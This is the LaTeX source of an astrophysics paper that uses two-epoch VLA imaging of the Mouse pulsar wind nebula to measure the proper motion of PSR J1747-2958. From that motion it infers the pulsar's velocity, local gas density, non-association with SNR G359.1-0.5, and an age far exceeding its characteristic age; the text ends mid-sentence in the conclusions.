The evolution of neutron stars and the potential relationships between some of their observed classes remain outstanding problems in
astrophysics. Proper motion studies of neutron stars can provide independent age estimates with which to shed light on these questions.
In particular, the well defined geometry of bow shock pulsar wind nebulae (PWNe; \citeauthor{gaensler:3} \citeyear{gaensler:3}),
where the relativistic wind from a high-velocity pulsar is confined by ram pressure, can be used as a probe to aid in the understanding
of both neutron star evolution and the properties of the local medium through which these stars travel.
The ``Mouse'' (PWN~G359.23$-$0.82), a non-thermal radio nebula, was discovered as part of a radio continuum survey of the
Galactic center region \citep{yusef}, and was suggested to be powered by a young pulsar following X-ray detection \citep{predehl}.
It is now recognized as a bow shock PWN moving supersonically through the interstellar medium (ISM; \citeauthor{gaensler:5} \citeyear{gaensler:5}).
Its axially symmetric morphology, shown in Figure \ref{fig:yusef20cm}, consists of a compact ``head'', a fainter ``body'' extending
for $\sim$10$^\prime$$^\prime$, and a long ``tail'' that extends westward behind the Mouse for $\sim$40$^\prime$$^\prime$
and $\sim$12$^\prime$ at X-ray and radio wavelengths respectively \citep{gaensler:5,mori}. The cometary tail appears to indicate
motion away from a nearby supernova remnant (SNR), G359.1$-$0.5 \citep{yusef}.
\begin{figure*}[t]
\setlength{\abovecaptionskip}{-7pt}
\begin{center}
\includegraphics[trim = 0mm 0mm 0mm 0mm, clip, angle=-90, width=13cm]{f1.ps}
\end{center}
\caption{VLA image of the Mouse (PWN~G359.23$-$0.82) at 1.4~GHz with a resolution of 12\farcs8$\times$8\farcs4 (reproduced from
\citeauthor{gaensler:5} \citeyear{gaensler:5}). The brightness scale is logarithmic, ranging between $-$2.0
and $+$87.6~mJy~beam$^{-1}$ as indicated by the scale bar to the right of the image. The eastern rim of SNR~G359.1$-$0.5 is faintly visible west
of $\sim$RA~17$^{\mbox{\scriptsize{h}}}$46$^{\mbox{\scriptsize{m}}}$25$^{\mbox{\scriptsize{s}}}$.}
\label{fig:yusef20cm}
\end{figure*}
A radio pulsar, J1747$-$2958, has been discovered within the ``head'' of the Mouse \citep{camilo:1}. PSR~J1747$-$2958 has a spin
period $P=98.8$ ms and period derivative $\dot{P}=6.1\times10^{-14}$, implying a spin-down luminosity
$\dot{E}=2.5 \times 10^{36}$~ergs~s$^{-1}$, surface dipole magnetic field strength $B=2.5\times10^{12}$~G, and characteristic age
$\tau_{c} \equiv P/ 2\dot{P}=25$~kyr (\citeauthor{camilo:1} \citeyear{camilo:1}; see also updated timing data from
\citeauthor{gaensler:5} \citeyear{gaensler:5}). The distance to the pulsar is {\footnotesize $\gtrsim$}4~kpc from X-ray
absorption \citep{gaensler:5}, and {\footnotesize $\lesssim$}5.5 kpc~from HI absorption \citep{uchida}. Here we assume that
the system lies at a distance of $d=5d_{5}$~kpc, where $d_{5}=1\pm0.2$ ($1\sigma$).
Given such a small characteristic age, it is natural to ask where PSR~J1747$-$2958 was born and to try and find an
associated SNR. While it is possible that no shell-type SNR is visible, such as with the Crab pulsar \citep{sankrit} and other young
pulsars \citep{braun}, an association with the adjacent SNR~G359.1$-$0.5 appears plausible. This remnant was initially suggested to
be an unrelated background object near the Galactic center \citep{uchida}. However, it is now believed that the two may be located at
roughly the same distance (\citeauthor{yusef3} \citeyear{yusef3}, and references therein). By determining a proper motion for
PSR~J1747$-$2958, this association can be subjected to further scrutiny (for example, see analysis of PSR~B1757$-$24,
PWN~G5.27$-$0.90 and SNR~G5.4$-$1.2; \citeauthor{blazek} \citeyear{blazek}; \citeauthor{zeiger} \citeyear{zeiger}).
As PSR~J1747$-$2958 is a very faint radio source, it is difficult to measure its proper motion interferometrically. It is also
difficult to use pulsar timing to measure its proper motion due to
timing noise and its location near the ecliptic plane \citep{camilo:1}. To circumvent these issues, in this paper we investigate
dual-epoch high-resolution radio observations of the Mouse nebula, spanning 12 years from 1993
to 2005, with the intention of indirectly inferring the motion of PSR~J1747$-$2958 through the motion of its bow shock PWN. In
\S~\ref{SectionObservations} we present these observations. In \S~\ref{SectionAnalysis} we present our analysis and measurement
of proper motion using derivative images of PWN~G359.23$-$0.82. In \S~\ref{SectionDiscussion} we use our measurement to determine an
in situ hydrogen number density for the local ISM, to resolve the question of a possible association with SNR~G359.1$-$0.5, and to investigate
the age and possible future evolution of PSR~J1747$-$2958. We summarize our conclusions in \S~\ref{SectionConclusions}.
\section{Observations}\label{SectionObservations}
PWN~G359.23$-$0.82 was observed with the Very Large Array (VLA) on 1993 February 2 (Program AF245) and again\footnote{An observation of
PWN~G359.23$-$0.82 was also carried out on 1999 October 8 (Program AG571). However, the target was observed mainly at low elevation and
the point spread function and spatial frequency coverage were both poor as a result, thus ruling out the observation's amenability to
astrometric comparison.} on 2005 January 22 (Program AG671). Each of these observations were carried out in the hybrid BnA configuration
at a frequency near 8.5 GHz. The 1993 and 2005 epochs used on-source observation times of 3.12 and 2.72 hours respectively. The 1993
observation only measured $RR$ and $LL$ circular polarization products, while the 2005 observation measured the cross terms $RL$ and
$LR$ as well. Both observations used the same pointing center, located at
$\mbox{RA}$~$=$~$17^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec764, $\mbox{Dec}$~$=$~$-29$\degree58$^\prime$1\farcs12 (J2000),
as well as the same primary flux calibrator, 3C286. Both were phase-referenced to the extragalactic source TXS~1741$-$312, located at
$\mbox{RA}$~$=$~$17^{\mbox{\scriptsize{h}}}$44$^{\mbox{\scriptsize{m}}}$23\farcsec59, $\mbox{Dec}$~$=$~$-31$\degree16$^\prime$35\farcs97 (J2000),
which is separated by $1\hbox{$.\!\!^\circ$}4$ from the pointing center.
Data reduction was carried out in near identical fashion for both epochs using the MIRIAD package \citep{sault:2}, taking into
consideration the slightly different correlator mode used in the 1993 data. This process involved editing, calibrating, and
imaging the data using multi-frequency synthesis and square pixels of size 50~$\times$~50 milli-arcseconds. These images were
then deconvolved using a maximum entropy algorithm and smoothed to a common resolution with a circular Gaussian of full width at
half-maximum (FWHM) 0\farcs81. The resulting images are shown in the left column of Figure \ref{fig:allImages}.
\begin{figure*}[t]
\setlength{\abovecaptionskip}{-7pt}
\begin{center}
\includegraphics[trim = 0mm 0mm 0mm 0mm, clip, angle=-90, width=12cm]{f2.ps}
\end{center}
\caption{{\it Left column:} VLA observations of the Mouse at 8.5~GHz over two epochs separated by 12 yr. Each image covers
a 14\farcs5$\times$8\farcs5 field at a resolution of 0\farcs81, as indicated by the circle at the bottom right of each panel. The brightness
scale is linear, ranging between $-$0.23 and $+$3.5~mJy~beam$^{-1}$.
{\it Right column:} Spatial x-derivative images for 1993 (top) and 2005 (bottom), covering the same regions as images in the left column.
The images are shown in absolute value to increase visual contrast using a linear brightness scale spanning zero and the largest magnitude
derivative from either image. The box between $\sim$RA~17$^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec8$-$16\farcsec5 indicates
the eastern region extracted for cross-correlation.
{\it All panels:} Contours are shown over each image at 30\%, 50\%, 75\% and 90\% of the peak flux within their respective column group.
The dashed vertical line in each panel has been arbitrarily placed at a right ascension near the brightness peak in the top-right panel
in order to determine if motion can be seen by eye between epochs.}
\label{fig:allImages}
\end{figure*}
The peak flux densities of the 1993 and 2005 images are 3.24 and 3.25~mJy~beam$^{-1}$, respectively; the noise in these two images are
51 and 35~$\mu$Jy~beam$^{-1}$, respectively. The pulsar J1747$-$2958 is located at
$\mbox{RA}$~$=$~$17^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec882,
$\mbox{Dec}$~$=$~$-29$\degree58$^\prime$1\farcs0 (J2000), within the region of intense synchrotron emission seen
in each image (see \S~3.5 of \citeauthor{gaensler:5} \citeyear{gaensler:5}). Qualitatively comparing each epoch from the left column of
Figure \ref{fig:allImages}, it appears that the head of PWN~G359.23$-$0.82 has the same overall shape in both images,
with a quasi-parabolic eastern face, approximate axial symmetry along a horizontal axis through the centre of the nebula (although
the position of peak intensity seems to shift slightly in declination), and a small extension to the west. By eye the PWN seems
to be moving from west to east over time, in agreement with expectation from the cometary morphology seen in Figure \ref{fig:yusef20cm}.
Beyond any minor morphological changes seen between the images in the left column of Figure \ref{fig:allImages}, the Mouse nebula seems
to have expanded slightly over time.
\section{Analysis}\label{SectionAnalysis}
To quantify any motion between epochs, an algorithm was developed to evaluate the cross-correlation coefficient over a range of
pixel shifts between images, essentially by producing a map of these coefficients. This algorithm made use of the Karma visualization package
\citep{gooch} to impose accurate non-integer pixel shifts.
We applied our algorithm to the image pair from the left column of Figure \ref{fig:allImages} to determine an image offset measurement. To check
that this offset measurement would be robust against any possible nebular morphological change between epochs, we also applied our algorithm to the
same image pair when both images were equally clipped at various flux density upper-level cutoffs. We found that the offset measurement was strongly
dependent on the choice of flux density cutoff. Clearly such variation in the measured shift between epochs was not desirable, as selection of
a final solution would have required an arbitrary assumption about the appropriate level of flux density clipping to use. There was also no
strong indication that the region of peak flux density in each image coupled with the exact location of PSR~J1747$-$1958. In order to isolate
the motion of the pulsar from as much nebular morphological change as possible, we focused on a different method involving the cross-correlation
of spatial derivatives of the images from the left column of Figure \ref{fig:allImages}.
As there is not enough information to solve for an independent Dec-shift, we will only focus on an RA-shift, and will assume that any Dec changes
are primarily due to morphological evolution of the Mouse nebula. To justify this assumption, we note simplistically that the cometary tail
of the Mouse in Figure \ref{fig:yusef20cm} is oriented at {\footnotesize $\lesssim$}5\ensuremath{^\circ}~from the RA-axis, and thus estimate that any
Dec motion contributes less than 10\% to the total proper motion of the nebular system. The small angle also justifies our decision
not to calculate derivatives along orthogonal axes rotated against the RA-Dec coordinate system.
For each epoch, an image of the first spatial derivative of intensity in the x (RA) direction was created by shifting the original
image by 0.1 pixels along the RA-axis, subtracting the original from this shifted version, and then dividing by the value of the shift.
These x-derivative images are shown in the right column of Figure \ref{fig:allImages}, where the brighter pixels represent regions of larger
x-derivative from the corresponding left column images (note that these derivative images are shown in absolute value so as to increase their
visual contrast; this operation was not applied to the analyzed data).
The x-derivative images have signal-to-noise ratios $\sim$13, since progression to higher derivatives degrades
sensitivity. As seen in the right column of Figure \ref{fig:allImages}, the x-derivative images of the Mouse are
divided into two isolated regions: an eastern forward region and a western rear region. Derivatives in the eastern region
are greater in magnitude than those in the western region.
As we will justify in \S~\ref{SectionDiscussion}, we propose that the eastern region of the x-derivative images tracks the forward
termination shock of the Mouse nebula, which in turn acts as a proxy for an upper limit on the motion of PSR~J1747$-$2958. The
eastern region provides a natural localized feature at each epoch with which to generate cross-correlation maps in order to track the motion
of PSR~J1747$-$2958.
\subsection{Calculation of Nebular Proper Motion}\label{Subsection:FinalCalc}
To prepare the x-derivative images for cross-correlation, their eastern regions, extending between Right Ascensions (J2000) of
17$^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$15\farcsec8 and
17$^{\mbox{\scriptsize{h}}}$47$^{\mbox{\scriptsize{m}}}$16\farcsec5 (see Figure \ref{fig:allImages}), were extracted and
padded along each side with 50 pixels (2500~mas) of value zero. These cropped and padded x-derivative images for the 1993 and 2005
epochs were then cross-correlated with each other over a range of non-integer pixel shifts between $-$2500 and $+$2500~mas in both RA
and Dec. The resultant 2005$-$1993 cross-correlation map, which indicates the shift required to make the 1993 epoch colocate with the
2005 epoch, is shown in the left of Figure \ref{fig:finalResults}.
\begin{figure*}[t]
\setlength{\abovecaptionskip}{-3pt}
\begin{center}
\begin{minipage}[c]{0.45\textwidth}
\begin{center}
\vspace{-4mm}
\includegraphics[trim = 0mm 0mm 5mm 0mm, width=5.3cm, angle=-90]{f3leftg.ps}
\end{center}
\end{minipage}
\hspace{1mm}
\begin{minipage}[c]{0.45\textwidth}
\begin{center}
\vspace{-7mm}
\includegraphics[trim = -3mm 0mm 6mm 0mm, width=4.7cm, angle=-90]{f3right.ps}
\end{center}
\end{minipage}
\end{center}
\caption{{\it Left}: Cross-correlation map for cropped and padded x-derivative images between 1993 and 2005. Shifts range
from $-$2500 to $+$2500~mas in both RA and Dec. The pixels are scaled from zero (white) to the peak value of the
map (black), and contours are at 50\%, 68.3\%, 99.5\%, and 99.7\% of this peak value. {\it Right}: Profile along a line
parallel to the RA-axis through the peak value of the cross-correlation map (solid curve). The caption quantifies
the RA-shift for the fitted peak value (also indicated by the vertical dashed line), FWHM (also indicated by the dotted
vertical lines), and signal-to-noise ratio.}
\label{fig:finalResults}
\end{figure*}
Note that the map in Figure \ref{fig:finalResults} incorporates trial shifts large enough to probe regions
where the cross-correlation falls to zero (corresponding to cross-correlation between signal and a source-free region,
as opposed to only probing trial shifts close to the maxima of each x-derivative map). In this way, the contours presented
in Figure \ref{fig:finalResults} represent percentages of the peak cross-correlation value.
To quantify the shift between epochs, a profile along a line parallel to the RA-axis was taken through the peak of the
cross-correlation map, as shown in the right of Figure \ref{fig:finalResults}. We assume that morphological changes
are negligible in the eastern region of the x-derivative images; therefore, by taking a profile through the peak we tolerate
small Dec shifts between the two epochs.
The RA shift between the 2005 and 1993 epochs was determined by fitting a Gaussian to the central 660~mas of the cross-correlation
profile. The resultant shift is 154~mas with a statistical uncertainty of 7~mas, where the latter is equal to the FWHM divided by
twice the signal-to-noise ratio. This calculation reflects the angular resolution and noise in the images, but to completely quantify
the error on the shift between the two epochs, systematic errors also need to be incorporated.
To estimate the positional error in the image plane, corresponding to phase error in the spatial frequency plane, the phases of the complex
visibility data for each epoch were self-calibrated\footnote{Note that self-calibration was not used in the general reduction process because
it would have caused a degradation in relative positional information between the final images, as the phases would no longer be tied to a
secondary calibrator of known position.}. By dividing the standard error of the mean of the phase variation in the gain solutions by
180\ensuremath{^\circ}, the fraction of a diffraction-limited beam by which positions may have been in error in the image plane were calculated. By
multiplying this fraction with the diffraction limited beamwidth for the 1993 and 2005 epochs, the two-dimensional relative positional
uncertainty of these two reference frames was estimated to be 22 and 20 mas respectively.
The systematic error in our measurement, which describes the relative positional error between the two epochs, was then determined by
reducing the self-calibrated positional uncertainties for each epoch by $\sqrt{2}$ (we are only looking at random positional uncertainties
projected along the RA-axis), and added in quadrature. This error was found to be 21~mas, which totally dominates the much smaller
statistical error of 7~mas.
By calculating the total error as the quadrature sum of the statistical and systematic errors, the RA-shift of the PWN tip between the
1993 and 2005 epochs was found to be $154\pm22$~mas. When divided by the 4372 days elapsed between these two epochs, the measured shift
corresponds to a proper motion of $\mu=12.9\pm1.8$~mas~yr$^{-1}$ in an eastward direction. We therefore detect motion at the
$7\sigma$ level. Note that, at an assumed distance of $\sim$5~kpc along a line of sight toward the Galactic center, this motion is
unlikely to be contaminated significantly by Galactic rotation \citep{olling}.
If we simplistically compare the eastward component of the proper motion with the angle of the Mouse's cometary tail, as described earlier in
\S~\ref{SectionAnalysis}, we obtain a crude estimate of $\sim$1~mas~yr$^{-1}$ for the northerly component of the nebula's proper motion. As this
value is well within the error for the eastward motion, which is dominated by systematic effects, we feel that our earlier assumption of pure
eastward motion in the presence of relative positional uncertainty between the 1993 and 2005 reference frames is justified.
\section{Discussion}\label{SectionDiscussion}
Bow shock PWNe have a double-shock structure consisting of an outer bow shock where the ambient ISM is collisionally excited, an inner termination
shock at which the pulsar's relativistic wind is decelerated, and a contact discontinuity between these two shocks which marks the boundary between
shocked ISM and shocked pulsar wind material \citep{gaensler:3}. The outer bow shock may emit in H$\alpha$, though for systems such as
PWN~G359.23$-$0.82 with high levels of extinction along their line of sight, the detection of such emission would not be expected. The inner termination
shock, which encloses the pulsar's relativistic wind, may emit synchrotron radiation detectable at radio/X-ray wavelengths. It is expected that any
synchrotron emission beyond the termination shock would be sharply bounded by the contact discontinuity \citep{gaensler:5}.
As mentioned in \S~\ref{SectionAnalysis}, we suggest that the eastern regions of the x-derivative images from Figure \ref{fig:allImages}
provide the best opportunity to track motion of PSR~J1747$-$2958, relatively independent of any morphological changes occurring in
PWN~G359.23$-$0.82. Physically, these regions of greatest spatial derivative (along the RA-axis) might correspond to the vicinity of the
termination shock apex, or possibly the contact discontinuity between the two forward shocks, where motion of the pulsar is causing
confinement of its wind and where rapid changes in flux might be expected to occur over relatively small angular scales. This is
consistent with hydrodynamic simulations which predict that the apex of the bow shock will be located just outside a region of intense
synchrotron emission in which the pulsar lies \citep{bucc,van:1}.
The assumption that the eastern region of each x-derivative image can be used as a proxy to track the motion of PSR~J1747$-$2958 is
therefore plausible, but difficult to completely justify. To show that motion calculated in this way provides an upper limit to the
true motion of PSR~J1747$-$2958 we recall the overall morphological change described at the end of \S~\ref{SectionObservations}, namely
that the Mouse nebula has expanded with time between the 1993 to 2005 epochs. This expansion suggests that the ISM density may be
dropping, causing the termination shock to move further away from pulsar, so that any motion calculated using the nebula may in
fact overestimate the motion of the pulsar (a similar argument was used by \citeauthor{blazek} \citeyear{blazek} in placing an upper
limit on the motion of the PWN associated with PSR~B1757$-$24). Such changes in density are to be expected as the nebula moves through
interstellar space, where like the spectacular Guitar nebula \citep{chatterjee:1} motion may reveal small-scale inhomogeneities in the
density of the ISM. We therefore assume that our measurement of proper motion from \S~\ref{Subsection:FinalCalc} corresponds to an
upper limit on the true proper motion of PSR~J1747$-$2958.
\subsection{Space Velocity and Environment of PSR~J1747$-$2958}\label{Subsec:SpaceVel}
Using our proper motion result from \S~\ref{Subsection:FinalCalc} and the arguments for interpreting this motion as an upper limit
from \S~\ref{SectionDiscussion}, the projected eastward velocity of PSR~J1747$-$2958 is inferred to be
$V_{\mbox{\tiny{PSR,$\perp$}}}$~{\footnotesize $\leq$}~$\left(306\pm43\right)d_{5}$~km~s$^{-1}$. Given that no motion along the line
of sight or in Dec could be measured, we will assume that our estimate of $V_{\mbox{\tiny{PSR,$\perp$}}}$ approximates
the 3-dimensional space velocity $V_{\mbox{\tiny{PSR}}}$.
In a bow shock PWN, the pulsar's relativistic wind will be confined and balanced by ram pressure. Using our proper motion upper limit
(assuming $V_{\mbox{\tiny{PSR}}}$~$\approx$~$V_{\mbox{\tiny{PSR,$\perp$}}}$), the pressure balance relationship\footnote{This
relationship assumes a uniform density $\rho$ with typical cosmic abundances, expressed as $\rho=1.37n_{0}m_{H}$, where $m_{H}$ is the
mass of a hydrogen atom and $n_{0}$ is the number density of the ambient ISM.}
$V_{\mbox{\tiny{PSR}}}=305n_{0}^{-1/2}d_{5}^{-1}$~km~s$^{-1}$ from \S~4.4 of \citet{gaensler:5}, and Monte Carlo simulation, we find an
in situ hydrogen number density $n_{0}$~$\approx$~$\left(1.0_{-0.2}^{+0.4}\right)d_{5}^{-4}$~cm$^{-3}$ at 68\%
confidence, or $n_{0,95\%}$~$\approx$~$\left(1.0_{-0.4}^{+1.1}\right)d_{5}^{-4}$~cm$^{-3}$ at 95\% confidence. Our calculated density
$n_{0}$ implies a local sound speed of $\sim$5~km~s$^{-1}$, corresponding to motion through the warm phase of the ISM.
Our space velocity for PSR~J1747$-$2958 is comparable with other pulsars that have observed bow shocks \citep{chatterjee:2}, and is
consistent with the overall projected velocity distribution of the young pulsar population \citep{hobbs, faucher}.
We note that \citet{gaensler:5} estimated a proper motion and space velocity of $\approx$25~mas~yr$^{-1}$ and $\approx$600~km~s$^{-1}$,
respectively, which are a factor of two larger than the values determined in this paper. However, by halving their assumed sound speed
of 10~km~s$^{-1}$, their estimates of motion correspondingly halve.
We now use our proper motion and hydrogen number density results to resolve the question of association between PSR~J1747$-$2958
and SNR~G359.1$-$0.5, and to investigate the age and possible future evolution of this pulsar.
\subsection{Association with SNR~G359.1$-$0.5?}\label{Subsection:Association}
If PSR~J1747$-$2958 and the adjacent SNR~G359.1$-$0.5 are associated and have a common progenitor, then an age estimate for the system that is
independent of both distance and inclination effects is simply the time taken for the pulsar to traverse the eastward angular separation
between the explosion site inferred from the SNR morphology and its current location, at its inferred eastward proper motion
{\footnotesize $\lesssim$}~$\mu$. Assuming pulsar birth at the center of the SNR, the eastward angular separation between the center of
SNR~G359.1$-$0.5 from \citet{uchida} and the location of PSR~J1747$-$2958 from the timing solution by \citet{gaensler:5} is
found to be $\theta \sim 23'$, which would imply a system age of $\theta / \mu$~{\footnotesize $\gtrsim$}~110~kyr.
Given such a large age, and the unremarkable interstellar hydrogen number density at the (currently assumed) nearby Mouse
(from \S~\ref{Subsec:SpaceVel}), it would be difficult to argue why SNR~G359.1$-$0.5 has not dissipated and faded from view. Instead,
SNR~G359.1$-$0.5 appears to be a middle aged remnant $\sim$18~kyr old which continues to emit thermal X-rays \citep{bamba}. We conclude,
independent of distance estimates to either the pulsar or the SNR, that PSR~J1747$-$2958 is moving too slowly to be physically associated
with the relatively young SNR~G359.1$-$0.5.
\subsection{Age Estimate for PSR~J1747$-$2958}\label{Subsection:Age}
Given that an association between the Mouse and SNR~G359.1$-$0.5 is unlikely, as outlined in \S~\ref{Subsection:Association}, we now estimate the
age of PSR~J1747$-$2958 assuming that it is unrelated to this SNR.
As seen in Figure \ref{fig:yusef20cm}, there is a cometary tail of emission extending around 12$^{\prime}$ ($\sim$17$d_{5}$~pc) westward of
the Mouse, containing shocked pulsar wind material flowing back from the termination shock about PSR~J1747$-$2958 \citep{gaensler:5}. We begin
by simplistically assuming that this pulsar was born at the tail's western tip. By dividing the tail length by the proper motion
$\mu$, we estimate an age of $t_{\mbox{\tiny{tail}}}$~$\approx$~$56$~kyr. Note that this age is independent of any distance estimates to the
Mouse or of inclination effects. However, given that the tail appears to simply fade away rather than terminate suddenly, it is possible that tail
could be much longer, and thus that the system could be much older (by considering the upper limit arguments from \S~\ref{SectionDiscussion},
this system age may be even greater still). As discussed in \S~4.7 of \citet{gaensler:5}, it is unlikely that the Mouse or
its entire tail could still be located inside an unseen associated SNR, given that the tail is smooth and uninterrupted. In addition, the lack
of a rejuvenated SNR shell anywhere along the length of the tail (or indeed beyond it), such as that seen, for example, in the interaction
between PSR~B1951$+$32 and SNR~CTB80 \citep{van:2}, supports the conclusion that the Mouse's tail is located entirely in the ISM. Therefore,
the rim of the Mouse's unseen associated SNR must be located at a minimum angular separation of $\sim$12$^{\prime}$ west of the Mouse's current
location, implying that $t_{\mbox{\tiny{tail}}}$ is a lower limit on the time elapsed since PSR~J1747$-$2958 was in the vicinity of this rim.
To estimate the total age of PSR~J1747$-$2958 we thus need to incorporate the time taken for this pulsar to escape its associated
SNR and reach its current location, taking into account the continued expansion of the SNR following pulsar escape (which will sweep
up, and therefore shorten, part of the Mouse's tail initially located in the ISM). Using Monte Carlo simulation and following \citet{van:1},
we find that the time taken for a pulsar, traveling with velocity
$V_{\mbox{\tiny{PSR,$\perp$}}}$~{\footnotesize $\leq$}~$\left(306\pm43\right)d_{5}$~km~s$^{-1}$ through a typical interstellar environment
with constant hydrogen number density $n_{0}$ from \S~\ref{Subsec:SpaceVel}, to escape from its SNR (while
in the pressure-drive snowplow phase) of typical explosion energy $\sim$10$^{51}$~ergs, and leave behind a 12$^{\prime}$ tail in the ISM
which remains ahead of the expanding SNR, is $163_{-20}^{+28}$~kyr at 68\% confidence, or $163_{-39}^{+60}$~kyr at 95\% confidence. Note that
the errors quoted for this total time incorporate the error in $\mu$ and are only weakly dependent on
the uncertainty in distance $d_{5}$ (for comparison, when the distance to PSR~J1747$-$2958 is fixed at 5~kpc, the 68\% and 95\% confidence
intervals are reduced to $164_{-17}^{+22}$~kyr and $164_{-31}^{+52}$~kyr, respectively).
Assuming that PSR~J1747$-$2958 was created in such a supernova explosion, and noting that the pulsars's travel time in the ISM
$t_{\mbox{\tiny{tail}}}$ is a lower limit (even without taking into account the upper limit associated with $\mu$, as described earlier in
this section), we can thus establish a lower limit on the age of the pulsar of
$t_{\mbox{\tiny{total}}}$~{\footnotesize $\geq$}~$163_{-20}^{+28}$~kyr (68\% confidence). This lower limit is greater than 6 times the
characteristic age $\tau_{c}=$~25.5~kyr of PSR~J1747$-$2958, which was derived from its measured pulse $P$ and $\dot{P}$ \citep{camilo:1},
suggesting that, within the context of the characteristic approximation, the spindown properties of this pulsar deviate significantly from
magnetic dipole braking (see \S~\ref{Subsection:Evolution}).
Our result is similar to the age discrepancy previously claimed for PSR~B1757$-$24 \citep{gaensler:2}; however, ambiguity regarding
association with SNR G5.4$-$1.2 presents difficulties with this claim \citep{thorsett,zeiger}. In comparison, given the relatively
simple assumptions made in this paper, PSR~J1747$-$2958 arguably provides the most robust evidence to date that some pulsars may be much
older than their characteristic age. We now discuss the potential implications of this age discrepancy with regard to the future evolution
of PSR~J1747$-$2958.
\subsection{Possible Future Evolution of PSR~J1747$-$2958}\label{Subsection:Evolution}
Pulsars are assumed to slow down in their rotation according to the spin-down relationship $\dot{\Omega}=-K\Omega^{n}$, where $\Omega$ is the
pulsar's angular rotation frequency, $\dot{\Omega}$ is the angular frequency derivative, $n$ is the braking index, and $K$ is a positive constant
that depends on the pulsar's moment of inertia and magnetic moment. By taking temporal derivatives of this spin-down relationship, the rate at
which the characteristic age $\tau_{c}$ changes with time can be expressed as $d\tau_{c}/dt$=$(n-1)/2$ (e.g., \citeauthor{lyne5}
\citeyear{lyne5}). Evaluating $d\tau_{c}/dt$ as the ratio between $\tau_{c}=$~25.5~kyr and the lower age limit $t_{\mbox{\tiny{total}}}$,
we estimate a braking index of $n$~{\footnotesize $\lesssim$}~$1.3$ for PSR~J1747$-$2958 (incorporating the error limits from
$t_{\mbox{\tiny{total}}}$ does not significantly affect this value). Given that magnetic dipole braking corresponds
to $n=3$ (the value assumed when calculating $\tau_{c}$), the smaller braking index calculated here indicates that either some form of
non-standard pulsar braking is taking place, or that standard magnetic dipole braking is occurring in the presence of evolution of the magnetic
field or of the moment of inertia (e.g., \citeauthor{blandford} \citeyear{blandford}; \citeauthor{camilo:0} \citeyear{camilo:0}).
If we adopt a constant moment of inertia and assume standard electromagnetic dipole braking, then by performing a similar
derivation from the spin-down relationship for the surface magnetic field, the magnetic field growth timescale can be expressed as
$B/\left(dB/dt\right)$=$\tau_{c}/\left(3-n\right)$ (e.g., \citeauthor{lyne5} \citeyear{lyne5}). Evaluating this with our braking index, the magnetic
field growth timescale\footnote{As noted by \citet{lyne5} the magnetic field growth is not linear over time, as can be appreciated by taking an
example of a pulsar with braking index $n$=1.} is estimated to be $\approx$15~kyr.
It is interesting to note that the braking index inferred here for PSR~J1747$-$2958 is comparable to the value obtained from an estimate
of $\ddot{P}$ made for the Vela pulsar B0833$-$45, which was found to have $n = 1.4 \pm 0.2$ \citep{lyne4}. To
investigate the possible future evolution of PSR~J1747$-$2958, we plot its implied trajectory (along with that of the Vela pulsar) across the
$P-\dot{P}$ diagram, as shown in Figure \ref{fig:ppdot}. Note that the magnitude of each plotted vector indicates motion
over a timescale of 50 kyr assuming that $\ddot{P}$ is constant, which is not true for constant $n$; however, the trend is apparent. The longer
vector for the Vela pulsar simply indicates that it is braking more rapidly than PSR~J1747$-$2958.
\begin{figure}[h]
\setlength{\abovecaptionskip}{-7pt}
\begin{center}
\includegraphics[trim = 0mm 0mm 0mm 0mm, clip, width=8.5cm, angle=-90]{f4onlineCOLOR.ps}
\end{center}
\caption{The $P-\dot{P}$ diagram for rotating neutron stars, where points indicate the period and period derivative for over 1600 rotating
stars where such measurements were available (data obtained from the ATNF Pulsar Catalogue, version 1.34; \citeauthor{manchester} \citeyear{manchester}).
The periods and period derivatives of three neutron stars, B0833$-$45 (the Vela pulsar), J1747$-$2958 (the Mouse pulsar), and J0537$-$6910 (a 16-ms
pulsar in the Large Magellanic Cloud) are indicated with symbols (see discussion at the end of \S~\ref{Subsection:Evolution}), as well as those of
the known magnetars. Dashed lines indicate contours of constant $\tau_{c}$, while solid lines indicate contours of constant surface magnetic field
$B$. Points toward the bottom left are millisecond (recycled) pulsars, those in the central concentration are middle$-$old age pulsars, and those
to the top left are young pulsars. The middle$-$old age pulsars are presumed to move down to the right along lines of constant magnetic field,
corresponding to magnetic dipole braking, while some young pulsars such as the Vela pulsar have been found to be moving away from the main body of
pulsars, up and to the right toward the region of the magnetars. The plotted vectors for PSR~B0833$-$45 \citep{lyne5} and for PSR~J1747$-$2958 (this
paper) represent inferred trajectories across the diagram over 50~kyr, assuming a constant braking index over this time period; the magnitude of
each vector is proportional to the magnetic field growth timescale of the respective neutron star.}
\label{fig:ppdot}
\end{figure}
The plotted vectors for the Vela and Mouse pulsars both seem to point in the direction of the magnetars (high-energy neutron stars for which
$B${\footnotesize $\gtrsim$}10$^{14}$~G; for a review of magnetars, see \citeauthor{woods} \citeyear{woods}). By extrapolating the
trajectories in Figure \ref{fig:ppdot}, and assuming negligible magnetic field decay over time, it can be suggested that young, energetic,
rapidly spinning pulsars such as PSR~J0537$-$6910 \citep{marshall}, whose location in the $P-\dot{P}$ plane is shown with a star symbol,
may evolve into objects like the Vela or Mouse pulsars, which, as proposed by \citet{lyne5}, may in turn continue to undergo magnetic
field growth until arriving in the parameter space of the magnetars.
\section{Conclusions}\label{SectionConclusions}
We have investigated two epochs of interferometric data from the VLA spanning 12 years to indirectly infer a proper motion
for the radio pulsar J1747$-$2958 through observation of its bow shock PWN~G359.23$-$0.82. Derivative images were used to highlight
regions of rapid spatial variation in flux density within the original images, corresponding to the vicinity of the forward
termination shock, thereby acting as a proxy for the motion of the pulsar.
We measure an eastward proper motion for PWN~G359.23$-$0.82 of $\mu=12.9\pm1.8$~mas~yr$^{-1}$, and interpret this value as an upper
limit on the motion of PSR~J1747$-$2958. At this angular velocity, we argue that PSR~J1747$-$2958 is moving too slowly to be physically
associated with the relatively young adjacent SNR~G359.1$-$0.5, independent of distance estimates to either object or of inclination effects.
At a distance $d=5d_{5}$~kpc, the proper motion corresponds to a projected velocity of
$V_{\mbox{\tiny{PSR,$\perp$}}}$~{\footnotesize $\leq$}~$\left(306\pm43\right)d_{5}$~km~s$^{-1}$, which is consistent with the projected
velocity distribution for young pulsars. Combining the time taken for PSR~J1747$-$2958 to traverse its smooth $\sim$12$^\prime$ radio
